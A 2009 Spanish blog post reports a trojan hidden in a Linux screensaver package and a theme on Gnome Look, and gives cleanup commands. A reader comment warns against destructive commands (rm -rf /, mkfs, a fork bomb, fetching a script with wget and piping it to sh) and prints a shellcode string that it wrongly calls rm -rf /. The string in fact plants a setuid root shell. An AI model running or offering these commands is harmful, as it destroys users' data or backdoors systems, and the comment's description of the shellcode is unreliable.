Descubierto troyano en salvapantallas para Linux

Descubierto troyano en salvapantallas para Linux

Escrito por: Manu Mateos    10 diciembre 2009     1 minuto

Si visitas habitualmente Gnome Look para personalizar tu ordenador con Linux y Gnome ten cuidado, dado que han aparecido algunos archivos (entre ellos un salvapantallas) que vienen con bicho incorporado. Desconfía especialmente de los que requieren de una instalación (sobre todo los .deb), dado que se pueden instalar con un simple click (y en éste caso sí afectan al sistema, dado que en el momento que hacemos doble click en el paquete para instalarlo se nos pide nuestra contraseña de administrador).

Éste troyano al parecer abriría alguna puerta trasera en tu equipo para hacerlo partícipe de alguna fechoría digital, como ataques masivos de denegación de servicio. Igualmente se mantiene actualizado a sí mismo. También se habla de otro archivo afectado; un tema llamado Ninja Black. En la entrada extendida hay instrucciones para limpiar el sistema si eres de los afectados por éste troyano.

Apenas dos comandos son necesarios para limpiar el sistema; eliminar el paquete de instalación y el script que se ejecuta. Los comandos son los siguientes:

sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash
sudo dpkg -r app5552

Así ves como es bastante sencillo limpiar tu Linux tras una infección (y todo lo contrario a Windows, donde encontramos que el virus se ha metido hasta debajo de las piedras). Ah, y también vemos que no hay sistema invulnerable. Aunque sí muy cercanos a ese estado.

Via | Slashdot
Imagen | nitot en Flickr

un comentario

  1. anonimo dice:

    ???????????????????????????????

    1. rm -rf /Esto borrará recursivamente y de manera forzada todos los archivos de tu directorio raíz, o root.

    2. char esp[] __attribute__ ((section(”.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64 \x68″ “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d \x99″ “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16 \xf7″ “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74 \x56″ “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80 \x31″ “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62 \x69″ “\x6e\x2f\x73\x68\x00\x2d\x63\x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”; Esta es la versión hexadecimal de [rm -rf /], que podría confundir a los más experimentados.

    3. mkfs.ext3 /dev/sdaSe formateará (o borrará) todos los archivos en el dispositivo mencionado después del comando mkfs.

    4. :(){:|:&};: Conocido como forkbomb, le ordenará a tu sistema ejecutar una gran cantidad de procesos hasta que éste se congele. Frecuentemente puede llevarnos a datos corruptos.

    5. cualquier_comando > /dev/sdaCon este comando, se escribirá información en un block que usualmente corresponde al sistema de archivos, lo que resulta en una pérdida total de información.

    6. wget http://alguna_fuente_desconocida -O- | shNunca descargues archivos de fuentes desconocidas, pues después podrías ejecutar cualquier código malicioso que se te envíe.

    7. mv /home/tu_nombre/* /dev/nullSe moverán todos los archivos en tu directorio home a un lugar que no existe. Esto quiere decir que no volverás a ver esos documentos de nuevo.